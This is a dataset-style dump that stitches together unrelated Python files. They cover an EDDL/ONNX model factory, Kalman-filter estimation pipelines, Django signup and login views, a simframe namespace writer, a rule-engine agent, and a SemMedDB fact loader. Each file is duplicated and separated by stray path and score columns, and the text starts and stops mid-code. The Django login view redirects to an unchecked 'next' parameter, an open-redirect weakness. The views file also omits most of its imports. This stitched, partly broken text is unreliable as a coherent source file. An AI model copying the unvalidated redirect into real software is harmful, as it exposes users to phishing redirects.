list_of_losses: List[str] = None
list_of_metrics: List[str] = None
def __post_init__(self):
self.list_of_losses = self.list_of_losses or ["soft_cross_entropy"]
self.list_of_metrics = self.list_of_metrics or ["categorical_accuracy"]
def get_model(self):
cls_name = self._get_cls_name()
cls = globals()[cls_name]
net = cls.create_net()
self._build_net(net)
eddl.load(net, self.filename, "bin")
return globals()[cls_name](net, name=os.path.basename(self.filename))
def _build_net(self, net):
eddl.build(net,
eddl.rmsprop(self.learn_rate),
self.list_of_losses,
self.list_of_metrics,
eddl.CS_GPU(self.gpu, mem="low_mem")
if self.gpu else eddl.CS_CPU(),
init_weights=False)
def _get_cls_name(self):
if self.cls_name:
cls_name = self.cls_name
else:
basename = os.path.basename(self.filename)
cls_name = basename.split('-')[0]
cls_name = stringcase.capitalcase(stringcase.camelcase(cls_name))
return cls_name
@dataclass
class OnnxFactory(Factory):
def get_model(self):
net = eddl.import_net_from_onnx_file(self.filename)
self._build_net(net)
cls_name = self._get_cls_name()
cls = globals()[cls_name]
image_info = self._update_image_info(cls.default_image_info)
return cls(net,
image_info=image_info,
name=os.path.basename(self.filename))
def _update_image_info(self, image_info: ImageInfo) -> ImageInfo:
image_info = ImageInfo(color_type=image_info.color_type,
coord=image_info.coord,
channel=image_info.channel,
pixel_range=image_info.pixel_range)
onnx_model = onnx.load(self.filename)
for prop in onnx_model.metadata_props:
if prop.key == "Image.BitmapPixelFormat":
color_type = prop.value[:3].lower()
image_info.color_type = ImageInfo.ColorType(color_type)
if prop.key == "Image.NominalPixelRange":
pixel_range = prop.value.split('_', 1)[1]
image_info.pixel_range = ImageInfo.Range(pixel_range)
return image_info | 0.745954 | 0.364495 |
import numpy as np
from kalman_estimation import (Kalman4ARX, Kalman4FROLS, Selector, get_mat_data, get_terms_matrix, get_txt_data, make_func4K4FROLS, make_linear_func,
plot_term_ERR, save_3Darray, torch4FROLS, update_condidate_terms, save_2Darray)
def update_terms(data_root='data/', data_type_set={'linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear'}):
"""update condidate terms
Args:
data_root (str): 数据存储根目录
data_type_set (set, optional): 数据类型集合,Defaults to {'linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear'}.
"""
for data_type in data_type_set:
update_condidate_terms(f'{data_root}{data_type}_terms.mat', f'{data_root}{data_type}_candidate_terms.txt')
def get_json_data(fname):
"""获取 JSON 数据
Args:
fname (str): 存储 JSON 数据的文件路径和文件名
"""
import ujson
return ujson.load(open(fname, 'r'))
def kalman4ARX_pipeline(data_type, configs, n_trial):
"""基于 Kalman 滤波器的各个算法的 pipeline
types = ['linear', 'longlag_linear']
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
if data_type == 'linear':
y_coef100 = np.zeros((100, 5, 25))
else:
y_coef100 = np.zeros((100, 5, 50))
for trial in range(n_trial):
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals = term_selector.make_selection()[0]
fname = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}{trial+1}.txt"
print(f'data_type: {data_type}, trial: ### {trial+1}')
# 构造 Kalman Filter
kf = Kalman4ARX(normalized_signals, config['max_lag'], uc=config['uc'])
# 估计系数
y_coef, A_coef = kf.estimate_coef(config['threshold'])
y_coef100[trial] = y_coef
# 计算模型表达式并保存
est_model = make_linear_func(A_coef, fname=fname)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef100, 0)
var_y = np.var(y_coef100, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log100.txt"
save_3Darray(fname1, np.array([mean_y, var_y]))
def kalman4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
# 构造 Kalman Filter
kf = Kalman4FROLS(normalized_signals, Kalman_H=Kalman_H, uc=config['uc'])
y_coef = kf.estimate_coef()
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T)
def torch4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
kf = torch4FROLS(normalized_signals, Kalman_H=Kalman_H, n_epoch=config['n_epoch'])
y_coef = kf.estimate_coef()
print(kf.y_error, kf.y_error.shape)
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T) | tools/core_tools1.py | import numpy as np
from kalman_estimation import (Kalman4ARX, Kalman4FROLS, Selector, get_mat_data, get_terms_matrix, get_txt_data, make_func4K4FROLS, make_linear_func,
plot_term_ERR, save_3Darray, torch4FROLS, update_condidate_terms, save_2Darray)
def update_terms(data_root='data/', data_type_set={'linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear'}):
"""update condidate terms
Args:
data_root (str): 数据存储根目录
data_type_set (set, optional): 数据类型集合,Defaults to {'linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear'}.
"""
for data_type in data_type_set:
update_condidate_terms(f'{data_root}{data_type}_terms.mat', f'{data_root}{data_type}_candidate_terms.txt')
def get_json_data(fname):
"""获取 JSON 数据
Args:
fname (str): 存储 JSON 数据的文件路径和文件名
"""
import ujson
return ujson.load(open(fname, 'r'))
def kalman4ARX_pipeline(data_type, configs, n_trial):
"""基于 Kalman 滤波器的各个算法的 pipeline
types = ['linear', 'longlag_linear']
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
if data_type == 'linear':
y_coef100 = np.zeros((100, 5, 25))
else:
y_coef100 = np.zeros((100, 5, 50))
for trial in range(n_trial):
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals = term_selector.make_selection()[0]
fname = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}{trial+1}.txt"
print(f'data_type: {data_type}, trial: ### {trial+1}')
# 构造 Kalman Filter
kf = Kalman4ARX(normalized_signals, config['max_lag'], uc=config['uc'])
# 估计系数
y_coef, A_coef = kf.estimate_coef(config['threshold'])
y_coef100[trial] = y_coef
# 计算模型表达式并保存
est_model = make_linear_func(A_coef, fname=fname)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef100, 0)
var_y = np.var(y_coef100, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log100.txt"
save_3Darray(fname1, np.array([mean_y, var_y]))
def kalman4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
# 构造 Kalman Filter
kf = Kalman4FROLS(normalized_signals, Kalman_H=Kalman_H, uc=config['uc'])
y_coef = kf.estimate_coef()
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T)
def torch4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
kf = torch4FROLS(normalized_signals, Kalman_H=Kalman_H, n_epoch=config['n_epoch'])
y_coef = kf.estimate_coef()
print(kf.y_error, kf.y_error.shape)
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T) | 0.414425 | 0.399402 |
from django.shortcuts import render
# Create your views here.
def view_signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your Ehelp account.'
message = render_to_string('application/acc_active_email.html', {
'user': user,
'domain': current_site.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
email = EmailMessage(
mail_subject, message, to=[to_email]
)
email.send()
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = SignUpForm()
return render(request, 'application/../../templates/accounts/signup.html', {'form': form})
def view_login(request):
if request.user.is_authenticated:
return redirect('/')
if request.method == 'POST':
form = AuthenticationForm(data=request.POST)
if form.is_valid():
user = form.get_user()
login(request, user)
if 'next' in request.POST:
return redirect(request.POST.get('next'))
else:
return redirect('/')
else:
form = AuthenticationForm
return render(request=request, template_name='application/login.html', context={'form': form})
@login_required
def view_logout(request):
logout(request)
messages.info(request, "Logged out successfully")
return redirect('/accounts/login/')
@login_required
def view_privacy(request):
if request.method == 'POST':
password_change_form = PasswordChangeForm(data=request.POST, user=request.user)
if password_change_form.is_valid():
password_change_form.save()
return redirect('/privacy/')
else:
return redirect('/privacy/')
else:
password_change_form = PasswordChangeForm(user=request.user)
context = {
'password_change_form': password_change_form
}
return render(
request=request,
template_name='application/../../templates/accounts/privacy.html',
context=context,
status=200
)
@login_required
def view_profile(request):
if request.method == 'POST':
if request.GET['contact']:
form = FormUserContact(request.POST, instance=request.user)
if form.is_valid():
form.save()
else:
form = FormUserProfile(request.POST, request.FILES, instance=request.user)
if form.is_valid():
form.save()
return redirect('application:profile')
form = FormUserProfile(instance=request.user)
form_contact = FormUserContact(instance=request.user)
return render(
request=request,
template_name='application/profile.html',
context={'form': form, 'form_contact': form_contact},
status=200
) | ehelp/accounts/views.py | from django.shortcuts import render
# Create your views here.
def view_signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your Ehelp account.'
message = render_to_string('application/acc_active_email.html', {
'user': user,
'domain': current_site.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
email = EmailMessage(
mail_subject, message, to=[to_email]
)
email.send()
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = SignUpForm()
return render(request, 'application/../../templates/accounts/signup.html', {'form': form})
def view_login(request):
if request.user.is_authenticated:
return redirect('/')
if request.method == 'POST':
form = AuthenticationForm(data=request.POST)
if form.is_valid():
user = form.get_user()
login(request, user)
if 'next' in request.POST:
return redirect(request.POST.get('next'))
else:
return redirect('/')
else:
form = AuthenticationForm
return render(request=request, template_name='application/login.html', context={'form': form})
@login_required
def view_logout(request):
logout(request)
messages.info(request, "Logged out successfully")
return redirect('/accounts/login/')
@login_required
def view_privacy(request):
if request.method == 'POST':
password_change_form = PasswordChangeForm(data=request.POST, user=request.user)
if password_change_form.is_valid():
password_change_form.save()
return redirect('/privacy/')
else:
return redirect('/privacy/')
else:
password_change_form = PasswordChangeForm(user=request.user)
context = {
'password_change_form': password_change_form
}
return render(
request=request,
template_name='application/../../templates/accounts/privacy.html',
context=context,
status=200
)
@login_required
def view_profile(request):
if request.method == 'POST':
if request.GET['contact']:
form = FormUserContact(request.POST, instance=request.user)
if form.is_valid():
form.save()
else:
form = FormUserProfile(request.POST, request.FILES, instance=request.user)
if form.is_valid():
form.save()
return redirect('application:profile')
form = FormUserProfile(instance=request.user)
form_contact = FormUserContact(instance=request.user)
return render(
request=request,
template_name='application/profile.html',
context={'form': form, 'form_contact': form_contact},
status=200
) | 0.387459 | 0.078713 |
from simframe.frame.abstractgroup import AbstractGroup
from simframe.frame.field import Field
from simframe.frame.group import Group
from simframe.io.reader import Reader
from simframe.io.writer import Writer
from simframe.utils.color import colorize
from collections import deque
import copy
import numbers
import numpy as np
from types import SimpleNamespace
class namespacewriter(Writer):
"""Class to write ``Frame`` object to namespace"""
def __init__(self, *args, **kwargs):
super().__init__(_writeframetonamespace, dumping=False, description="Temporary namespace writer",
reader=namespacereader, *args, **kwargs)
self._buffer = deque([])
def __repr__(self):
ret = self.__str__()+"\n"
ret += "-" * (len(ret)-1) + "\n"
ret += " Data directory : {}\n".format(self.datadir)
ret += " Dumping : {}\n".format(
colorize(self.dumping, "yellow") if not self.dumping else self.dumping)
ret += " Verbosity : {}".format(self.verbosity)
return ret
def _getfilename(self):
"""Filenames are not required for this class."""
pass
def write(self, owner, i=0, *args, **kwargs):
"""Writes output to namespace
Parameters
----------
owner : Frame
Parent frame object
i : int
Not used in this class
forceoverwrite : boolean
Not used in this class
filename : string
Not used in this class"""
self._buffer.append(self._func(owner))
if self.verbosity > 0:
num = str(i).zfill(self._zfill)
msg = "Saving frame {}".format(num)
print(msg)
if self.dumping:
self.writedump(owner)
def reset(self):
"""This resets the namespace.
Notes
-----
WARNING: This cannot be undone."""
self._buffer.clear()
class namespacereader(Reader):
"""Class to read namespace outputs"""
def __init__(self, writer):
super().__init__(writer)
def all(self):
"""Functions that reads all output files and combines them into a single ``SimpleNamespace``.
Returns
-------
dataset : SimpleNamespace
Namespace of data set.
Notes
-----
This function is reading one output files to get the structure of the data and
calls ``read.sequence()`` for every field in the data structure."""
if self._writer._buffer == deque([]):
raise RuntimeError("Writer buffer is empty.")
# Read first file to get structure
data0 = self._writer._buffer[0]
return self._expand(data0)
def output(self, i):
"""Reading a single output
Parameters
----------
i : int
Number of output to be read
Returns
-------
n : SimpleNamespace
Namespace of desired output"""
if i >= len(self._writer._buffer):
raise RuntimeError("Output {} does not exist.".format(i))
return self._writer._buffer[i]
def sequence(self, field):
"""Reading the entire sequence of a specific field.
Parameters
----------
field : string
String with location of requested field
Returns
-------
seq : array
Array with requested values
Notes
-----
``field`` is addressing the values just as in the parent frame object.
E.g. ``"groupA.groupB.fieldC"`` is addressing ``Frame.groupA.groupB.fieldC``."""
if self._writer._buffer == deque([]):
raise RuntimeError("Writer buffer is empty.")
if not isinstance(field, str):
raise TypeError("<field> has to be string.")
loc = field.split(".")
N = len(self._writer._buffer)
ret = []
for i in range(N):
A = np.array(_getvaluefrombuffer(self._writer._buffer[i], loc))
if A.shape == (1,):
ret.append(A[0])
else:
ret.append(A)
return np.array(ret)
def _getvaluefrombuffer(buf, loc):
"""Returns a requested value from buffer.
Function is called recursively.
Parameters
----------
buf : dict
Buffer object
loc : list
List of strings with the requested location within buf
Returns
-------
ret : object
Reqested value in buf at position loc"""
if len(loc) > 1:
return _getvaluefrombuffer(buf.__dict__[loc[0]], loc[1:])
if not hasattr(buf, loc[0]):
raise RuntimeError("Requested <field> does not exist.")
return buf.__dict__[loc[0]]
def _converttonamespace(o):
"""Converts an object into a namespace
Parameters
----------
o : object
object
Returns
-------
ns : SimpleNamespace
Nested namespace with the data in Frame object
Notes
-----
Attributes beginning with underscore _ are being ignored.
So are fields with Field.save == False."""
ret = {}
# These things are written directy into the dictionary.
direct = (numbers.Number, np.number, tuple,
list, np.ndarray, str)
for key, val in o.__dict__.items():
# Ignore hidden variables
if key.startswith("_"):
continue
# Skip fields that should not be stored
if isinstance(val, Field) and val.save == False:
continue
if val is not None and isinstance(val, direct):
ret[key] = copy.copy(val)
else:
ret[key] = _converttonamespace(val)
return SimpleNamespace(**ret)
def _writeframetonamespace(frame):
"""Takes a list of dicts and a frame, stitches them together and returns namespace.
Paramters
---------
frame : Frame
Frame object to add
Returns
-------
n : SimpleNamespace
Namespace with data"""
d = _converttonamespace(frame)
return d | simframe/io/writers/namespacewriter.py | from simframe.frame.abstractgroup import AbstractGroup
from simframe.frame.field import Field
from simframe.frame.group import Group
from simframe.io.reader import Reader
from simframe.io.writer import Writer
from simframe.utils.color import colorize
from collections import deque
import copy
import numbers
import numpy as np
from types import SimpleNamespace
class namespacewriter(Writer):
"""Class to write ``Frame`` object to namespace"""
def __init__(self, *args, **kwargs):
super().__init__(_writeframetonamespace, dumping=False, description="Temporary namespace writer",
reader=namespacereader, *args, **kwargs)
self._buffer = deque([])
def __repr__(self):
ret = self.__str__()+"\n"
ret += "-" * (len(ret)-1) + "\n"
ret += " Data directory : {}\n".format(self.datadir)
ret += " Dumping : {}\n".format(
colorize(self.dumping, "yellow") if not self.dumping else self.dumping)
ret += " Verbosity : {}".format(self.verbosity)
return ret
def _getfilename(self):
"""Filenames are not required for this class."""
pass
def write(self, owner, i=0, *args, **kwargs):
"""Writes output to namespace
Parameters
----------
owner : Frame
Parent frame object
i : int
Not used in this class
forceoverwrite : boolean
Not used in this class
filename : string
Not used in this class"""
self._buffer.append(self._func(owner))
if self.verbosity > 0:
num = str(i).zfill(self._zfill)
msg = "Saving frame {}".format(num)
print(msg)
if self.dumping:
self.writedump(owner)
def reset(self):
"""This resets the namespace.
Notes
-----
WARNING: This cannot be undone."""
self._buffer.clear()
class namespacereader(Reader):
"""Class to read namespace outputs"""
def __init__(self, writer):
super().__init__(writer)
def all(self):
"""Functions that reads all output files and combines them into a single ``SimpleNamespace``.
Returns
-------
dataset : SimpleNamespace
Namespace of data set.
Notes
-----
This function is reading one output files to get the structure of the data and
calls ``read.sequence()`` for every field in the data structure."""
if self._writer._buffer == deque([]):
raise RuntimeError("Writer buffer is empty.")
# Read first file to get structure
data0 = self._writer._buffer[0]
return self._expand(data0)
def output(self, i):
"""Reading a single output
Parameters
----------
i : int
Number of output to be read
Returns
-------
n : SimpleNamespace
Namespace of desired output"""
if i >= len(self._writer._buffer):
raise RuntimeError("Output {} does not exist.".format(i))
return self._writer._buffer[i]
def sequence(self, field):
"""Reading the entire sequence of a specific field.
Parameters
----------
field : string
String with location of requested field
Returns
-------
seq : array
Array with requested values
Notes
-----
``field`` is addressing the values just as in the parent frame object.
E.g. ``"groupA.groupB.fieldC"`` is addressing ``Frame.groupA.groupB.fieldC``."""
if self._writer._buffer == deque([]):
raise RuntimeError("Writer buffer is empty.")
if not isinstance(field, str):
raise TypeError("<field> has to be string.")
loc = field.split(".")
N = len(self._writer._buffer)
ret = []
for i in range(N):
A = np.array(_getvaluefrombuffer(self._writer._buffer[i], loc))
if A.shape == (1,):
ret.append(A[0])
else:
ret.append(A)
return np.array(ret)
def _getvaluefrombuffer(buf, loc):
"""Returns a requested value from buffer.
Function is called recursively.
Parameters
----------
buf : dict
Buffer object
loc : list
List of strings with the requested location within buf
Returns
-------
ret : object
Reqested value in buf at position loc"""
if len(loc) > 1:
return _getvaluefrombuffer(buf.__dict__[loc[0]], loc[1:])
if not hasattr(buf, loc[0]):
raise RuntimeError("Requested <field> does not exist.")
return buf.__dict__[loc[0]]
def _converttonamespace(o):
"""Converts an object into a namespace
Parameters
----------
o : object
object
Returns
-------
ns : SimpleNamespace
Nested namespace with the data in Frame object
Notes
-----
Attributes beginning with underscore _ are being ignored.
So are fields with Field.save == False."""
ret = {}
# These things are written directy into the dictionary.
direct = (numbers.Number, np.number, tuple,
list, np.ndarray, str)
for key, val in o.__dict__.items():
# Ignore hidden variables
if key.startswith("_"):
continue
# Skip fields that should not be stored
if isinstance(val, Field) and val.save == False:
continue
if val is not None and isinstance(val, direct):
ret[key] = copy.copy(val)
else:
ret[key] = _converttonamespace(val)
return SimpleNamespace(**ret)
def _writeframetonamespace(frame):
"""Takes a list of dicts and a frame, stitches them together and returns namespace.
Paramters
---------
frame : Frame
Frame object to add
Returns
-------
n : SimpleNamespace
Namespace with data"""
d = _converttonamespace(frame)
return d | 0.810479 | 0.259591 |
from .rule import Antecedent
from ..betha_node import BethaNode
from ..alpha_node import AlphaNode
from ..rete import Rete
from abc import abstractmethod
from .run_agenda_action import RunAgendaAction
from .add_fact_agenda_action import AddFactAgendaAction
from .assert_fact_action import AssertFactAction
from .retract_fact_action import RetractFactAction
from .update_fact_action import UpdateFactAction
from ....kernel.agent.Agent import Agent
class PSAgent(Agent):
def __init__(self, agentID):
self.__rules = []
self.engine = Rete()
self.__templates = []
self.__periodic_action = None
super().__init__(agentID)
def add_template(self, template):
self.__templates.append(template)
def add_rule(self, rule):
self.__rules.append(rule)
@abstractmethod
def def_templates(self):
pass
@abstractmethod
def def_constructs(self):
pass
@abstractmethod
def set_periocic_action(self):
pass
def build(self):
for template in self.__templates:
self.engine.add_alpha_node(AlphaNode(template))
for rule in self.__rules:
betha_node = BethaNode()
betha_node.name = rule.name
for consequent in rule.get_consequents():
betha_node.add_consequent(consequent)
for antecedent in rule.get_antecedents():
betha_node.add_antecedent(antecedent)
if isinstance(antecedent, Antecedent):
alpha_node = self.engine.get_alpha_node(antecedent.template)
alpha_node.add_beta_node(betha_node)
betha_node.add_alpha_node(alpha_node)
def setUp(self):
self.state = {
'alive': False,
'time': None
}
self.addBehavior('agenda_process')
self.bindAction('agenda_process', 'run_agenda', RunAgendaAction())
self.bindAction('agenda_process', 'add_fact_agenda', AddFactAgendaAction())
self.addBehavior('process')
self.bindAction('process', 'assert_fact', AssertFactAction())
self.bindAction('process', 'update_fact', UpdateFactAction())
self.bindAction('process', 'retract_fact', RetractFactAction())
self.__periodic_action = self.set_periocic_action()
if self.__periodic_action:
self.addBehavior('periodic_process')
self.bindAction('periodic_process', 'periodic', self.__periodic_action)
# Build RETE
self.def_templates()
self.def_constructs()
self.build()
# Load data RETE
self.engine.load_agenda()
self.engine.load_work_memory()
def shutdown(self):
pass | pbesa/engine/ps/psagent/psagent.py | from .rule import Antecedent
from ..betha_node import BethaNode
from ..alpha_node import AlphaNode
from ..rete import Rete
from abc import abstractmethod
from .run_agenda_action import RunAgendaAction
from .add_fact_agenda_action import AddFactAgendaAction
from .assert_fact_action import AssertFactAction
from .retract_fact_action import RetractFactAction
from .update_fact_action import UpdateFactAction
from ....kernel.agent.Agent import Agent
class PSAgent(Agent):
def __init__(self, agentID):
self.__rules = []
self.engine = Rete()
self.__templates = []
self.__periodic_action = None
super().__init__(agentID)
def add_template(self, template):
self.__templates.append(template)
def add_rule(self, rule):
self.__rules.append(rule)
@abstractmethod
def def_templates(self):
pass
@abstractmethod
def def_constructs(self):
pass
@abstractmethod
def set_periocic_action(self):
pass
def build(self):
for template in self.__templates:
self.engine.add_alpha_node(AlphaNode(template))
for rule in self.__rules:
betha_node = BethaNode()
betha_node.name = rule.name
for consequent in rule.get_consequents():
betha_node.add_consequent(consequent)
for antecedent in rule.get_antecedents():
betha_node.add_antecedent(antecedent)
if isinstance(antecedent, Antecedent):
alpha_node = self.engine.get_alpha_node(antecedent.template)
alpha_node.add_beta_node(betha_node)
betha_node.add_alpha_node(alpha_node)
def setUp(self):
self.state = {
'alive': False,
'time': None
}
self.addBehavior('agenda_process')
self.bindAction('agenda_process', 'run_agenda', RunAgendaAction())
self.bindAction('agenda_process', 'add_fact_agenda', AddFactAgendaAction())
self.addBehavior('process')
self.bindAction('process', 'assert_fact', AssertFactAction())
self.bindAction('process', 'update_fact', UpdateFactAction())
self.bindAction('process', 'retract_fact', RetractFactAction())
self.__periodic_action = self.set_periocic_action()
if self.__periodic_action:
self.addBehavior('periodic_process')
self.bindAction('periodic_process', 'periodic', self.__periodic_action)
# Build RETE
self.def_templates()
self.def_constructs()
self.build()
# Load data RETE
self.engine.load_agenda()
self.engine.load_work_memory()
def shutdown(self):
pass | 0.433981 | 0.201558 |
from model.knowledgegraph import kg_derive_facts
def load_lg_facts(conn, query):
"""
loads triple-based facts from a SemMedDB and builds the corresponding idx_pmid
idx_pmid stores a idx_subject and a idx_object for each pmid from the query result
the indices store which (subject -> [object1, ..., objectn] and which object -> [sub1, ..., subn]
@param conn: SemMedDB connection handle
@param query: the query which retrieves facts from the database (must project pmid, subj and obj)
@return: the idx_pmid (which stores a idx_subject and idx_object behind each pmid)
"""
cur = conn.cursor()
cur.execute(query)
rows = cur.fetchall()
idx_pmid = {}
for r in rows:
pmid, sub, obj = str(r[0]), str(r[1]), str(r[2])
if pmid not in idx_pmid:
idx_s = {}
idx_o = {}
idx_pmid[pmid] = {"idx_subject": idx_s, "idx_object": idx_o}
else:
idx_s = idx_pmid[pmid]["idx_subject"]
idx_o = idx_pmid[pmid]["idx_object"]
if sub not in idx_s:
idx_s[sub] = set()
idx_s[sub].add(obj)
if obj not in idx_o:
idx_o[obj] = set()
idx_o[obj].add(sub)
return idx_pmid
def merge_2_into_1(res1, res2):
"""
merges 2 dictionaries together
the second dictionary is merged in the first one (the second remains unchanged / is copied)
@param res1: a dictionary in which the second dict will be merges
@param res2: second dict will remain unchanged
@return: the first dict (in which the second dict is merged)
"""
res = res1
for s, objects in res2.items():
if s not in res:
res[s] = objects.copy()
else:
res[s].update(objects)
return res
def count_val_size_in_dict(result):
"""
expects a dict with keys which map to lists
sums the size of all lists in the dict
@param result: a dict where each key maps to a list
@return: the summed size of all lists
"""
amount = 0
for k, values in result.items():
amount += len(values)
return amount
def derive_facts_with_context(context, relation1, relation2):
"""
derives facts like the kg but limited to contexts
@param context: the context index stores a set of key sas the contexts
